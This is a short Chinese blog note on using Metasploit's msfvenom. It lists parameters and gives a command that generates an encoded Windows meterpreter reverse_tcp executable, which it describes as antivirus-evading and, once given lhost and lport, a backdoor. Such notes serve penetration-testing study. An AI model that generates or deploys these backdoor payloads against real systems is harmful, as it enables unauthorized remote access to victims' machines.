溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

msfvenom學習

發(fā)布時間:2020-06-02 17:01:55 來源:網絡 閱讀:3110 作者:小毒物 欄目:安全技術

現(xiàn)在依然還有很多教學視頻、資料是使用之前的kali版本。隨著更新有些命令是不適應最新的kali的。(也是掉過坑的人)
msfvenom集成了msfpayload和msfencode,2015年之后移除了后兩項。再按照某些教程輸后兩個命令是不行的。


msfvenom重要參數(shù):(可以使用msfvenom -h查看所有參數(shù))
-p payload設置
-e 編碼設置
-a 系統(tǒng)結構,默認x86
-s payload最大大小
-i 編碼次數(shù)
-f 生成文件格式


另外幾個命令:
平臺查看: msfvenom --help-platforms
指定目標平臺:--platform xxx
格式查看: msfvenom --help-formats
查看payload設置: msfvenom -p <payload name> --payload-options(可以發(fā)現(xiàn)該payload適合的平臺等很多詳細信息)
注意:如果要創(chuàng)建x64的負載需使用-a x64


正確生成免殺文件:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -f exe >1.exe
如果需要生成后門文件,需要加上lhost(本地主機ip)以及l(fā)port(本地主機開放的端口)參數(shù)。
msfvenom學習
參考文章:https://www.hackers-arise.com/single-post/2017/07/31/Metasploit-Basics-Part-9-Using-msfvenom-to-Create-Custom-Payloads

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經查實,將立刻刪除涉嫌侵權內容。

AI